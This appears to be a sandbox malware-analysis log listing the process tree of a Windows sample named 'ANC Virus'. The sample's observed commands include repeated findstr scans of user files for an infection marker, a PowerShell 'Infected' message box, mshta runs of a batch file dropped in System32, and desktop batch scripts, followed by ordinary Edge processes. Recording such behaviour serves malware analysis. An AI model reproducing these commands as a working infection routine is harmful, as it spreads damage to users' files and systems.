- [level 16] PID 3804 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RenameMerge.vstx"
- [level 16] PID 3136 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RepairWait.ods"
- [level 16] PID 6076 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResizeInitialize.xlsx"
- [level 16] PID 5372 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResolveSuspend.dot"
- [level 16] PID 4588 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResumeJoin.csv"
- [level 16] PID 5092 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RevokeRead.vdw"
- [level 16] PID 4208 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SaveDebug.odt"
- [level 16] PID 5940 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchExport.vsdm"
- [level 16] PID 5824 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchStop.vsdm"
- [level 16] PID 2300 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SetSync.odp"
- [level 16] PID 4040 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ShowStop.vdx"
- [level 16] PID 4648 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipExport.pptx"
- [level 16] PID 2332 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipRestore.pdf"
- [level 16] PID 900 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\StepConnect.mht"
- [level 16] PID 1340 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SuspendUnprotect.txt"
- [level 16] PID 3676 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UndoInitialize.xlsb"
- [level 16] PID 5716 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UninstallGet.txt"
- [level 16] PID 2124 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UnpublishLock.pptm"
- [level 16] PID 5816 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\WriteLimit.ods"
- [level 16] PID 3432 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\Quick Notes.one"
- [level 16] PID 2752 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2"
- [level 16] PID 936 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Quick Notes.one"
- [level 16] PID 2112 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CloseNew.rm"
- [level 16] PID 1976 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CopyImport.ADTS"
- [level 16] PID 768 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSend.cab"
- [level 16] PID 3124 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSplit.rtf"
- [level 16] PID 4844 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DenyWait.xml"
- [level 16] PID 1580 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\FindCompress.xht"
- [level 16] PID 4948 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\LimitExit.mht"
- [level 16] PID 1156 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewBlock.mpeg"
- [level 16] PID 1632 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewPublish.temp"
- [level 16] PID 3548 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ReceiveRedo.ico"
- [level 16] PID 5008 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RegisterDismount.kix"
- [level 16] PID 1720 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RequestClose.ttc"
- [level 16] PID 2188 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ResetExpand.jfif"
- [level 16] PID 4472 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchClear.wma"
- [level 16] PID 4848 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchMerge.xla"
- [level 16] PID 5580 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\StepShow.html"
- [level 16] PID 244 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnblockCheckpoint.ico"
- [level 16] PID 248 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnregisterProtect.ram"
- [level 16] PID 224 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupDismount.eps"
- [level 16] PID 2732 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupUndo.emf"
- [level 16] PID 3852 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearLock.cr2"
- [level 16] PID 4684 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearMount.dib"
- [level 16] PID 4876 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompleteUnprotect.dxf"
- [level 16] PID 5936 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompressSkip.dib"
- [level 16] PID 3036 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromExport.jpg"
- [level 16] PID 5212 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromSkip.eps"
- [level 16] PID 5332 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertToNew.raw"
- [level 16] PID 5224 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\DebugMerge.dib"
- [level 16] PID 460 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EditSubmit.eps"
- [level 16] PID 1756 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EnterRename.tiff"
- [level 16] PID 1820 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportOut.wmf"
- [level 16] PID 5764 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportUninstall.gif"
- [level 16] PID 5176 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GetLimit.emf"
- [level 16] PID 1380 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GroupRevoke.emz"
- [level 16] PID 5932 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\InstallResize.wmf"
- [level 16] PID 5568 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\LockDisconnect.raw"
- [level 16] PID 3012 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\MoveDismount.raw"
- [level 16] PID 3512 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\My Wallpaper.jpg"
- [level 16] PID 3280 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\PushHide.emz"
- [level 16] PID 2612 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RemoveCompare.tiff"
- [level 16] PID 3384 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RepairUnregister.eps"
- [level 16] PID 1532 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ResolveWrite.bmp"
- [level 16] PID 3004 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SaveOpen.emz"
- [level 16] PID 480 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SearchInvoke.png"
- [level 16] PID 5748 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StartEnter.raw"
- [level 16] PID 1168 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StepUninstall.jpeg"
- [level 16] PID 1840 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SubmitResolve.png"
- [level 16] PID 2608 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SuspendShow.bmp"
- [level 16] PID 6048 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\TestRestart.svg"
- [level 16] PID 5992 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UndoSkip.eps"
- [level 16] PID 756 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallClear.dwg"
- [level 16] PID 2256 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallResolve.svg"
- [level 16] PID 4164 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertPush.zip"
- [level 16] PID 244 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertUndo.au3"
- [level 16] PID 248 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearSuspend.ppsm"
- [level 16] PID 224 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearWait.mp3"
- [level 16] PID 2732 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\CompareRepair.xltx"
- [level 16] PID 3852 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConfirmCopy.svg"
- [level 16] PID 4684 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectInstall.mp3"
- [level 16] PID 4876 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectLimit.tiff"
- [level 16] PID 5936 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConvertToOpen.fon"
- [level 16] PID 3036 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\DisconnectDisable.zip"
- [level 16] PID 5212 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\EditOut.xml"
- [level 16] PID 5332 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExitOpen.vsdx"
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExpandAdd.aiff"16⤵PID:5224
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExportConvertTo.clr"16⤵PID:460
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GetUninstall.xltm"16⤵PID:1756
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GroupExport.snd"16⤵PID:1820
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\LockApprove.asf"16⤵PID:5764
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountEnter.css"16⤵PID:5176
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountResolve.wax"16⤵PID:3736
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MoveHide.mid"16⤵PID:5548
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\PushWrite.wmv"16⤵PID:4168
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReadSkip.m1v"16⤵PID:3180
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReceiveWatch.php"16⤵PID:2800
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\RepairResize.html"16⤵PID:3096
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SaveDeny.jpg"16⤵PID:4784
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchBlock.mp2v"16⤵PID:4200
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchStart.png"16⤵PID:2340
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SendDismount.emf"16⤵PID:3104
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SetConvert.asp"16⤵PID:3024
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SplitCopy.xml"16⤵PID:1632
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchDisconnect.jpg"16⤵PID:4916
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchStop.ps1"16⤵PID:4732
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UndoInitialize.ppsm"16⤵PID:2308
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UnregisterWatch.i64"16⤵PID:2056
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\WaitPublish.xht"16⤵PID:2712
-
-
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 16, PID 4396)
  powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('Infected with ANC Virus')"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\mshta.exe (depth 4, PID 852)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2536)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2392)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2812)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 1556)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 3864)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 1092)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2792)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 4776)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2628)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 3564)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2760)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2328)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 1492)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 720)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 1012)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2856)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2484)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 2052)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 1400)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\mshta.exe (depth 4, PID 644)
  mshta.exe "C:\Windows\System32\balls.bat"
- C:\Windows\system32\cmd.exe (depth 1, PID 4688)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\UnregisterStop.bat" "
- C:\Windows\system32\cmd.exe (depth 1, PID 2732)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StepGrant.bat" "
- C:\Windows\system32\cmd.exe (depth 1, PID 5972)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeUnlock.bat" "
- C:\Windows\system32\cmd.exe (depth 1, PID 5348)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ProtectLimit.bat" "
- C:\Windows\system32\cmd.exe (depth 1, PID 1760)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ConvertFromPing.bat" "
  - System Network Configuration Discovery: Internet Connection Discovery
- C:\Windows\system32\cmd.exe (depth 1, PID 1700)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ClearLimit.bat" "
- C:\Windows\system32\cmd.exe (depth 1, PID 5224)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\PingShow.bat" "
  - System Network Configuration Discovery: Internet Connection Discovery
- C:\Windows\system32\cmd.exe (depth 1, PID 880)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeClose.bat" "
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1, PID 2436)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1612)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f8,0x7fffd42cf208,0x7fffd42cf214,0x7fffd42cf220
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 6052)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:11
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2664)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:2
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3096)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:13
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 200)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2284)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3728 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5972)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2612)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5032,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:14
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2040)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:14
  - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 2, PID 2548)
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:14
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4904)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6192,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:14
    - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe (depth 3, PID 2636)
      cookie_exporter.exe --cookie-json=1140
  - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 2, PID 228)
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:14
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1876)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6452,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6492 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5688)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6468,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:14
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3124)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 3696)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7fffd42cf208,0x7fffd42cf214,0x7fffd42cf220
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 4556)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1792,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:11
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3, PID 6076)
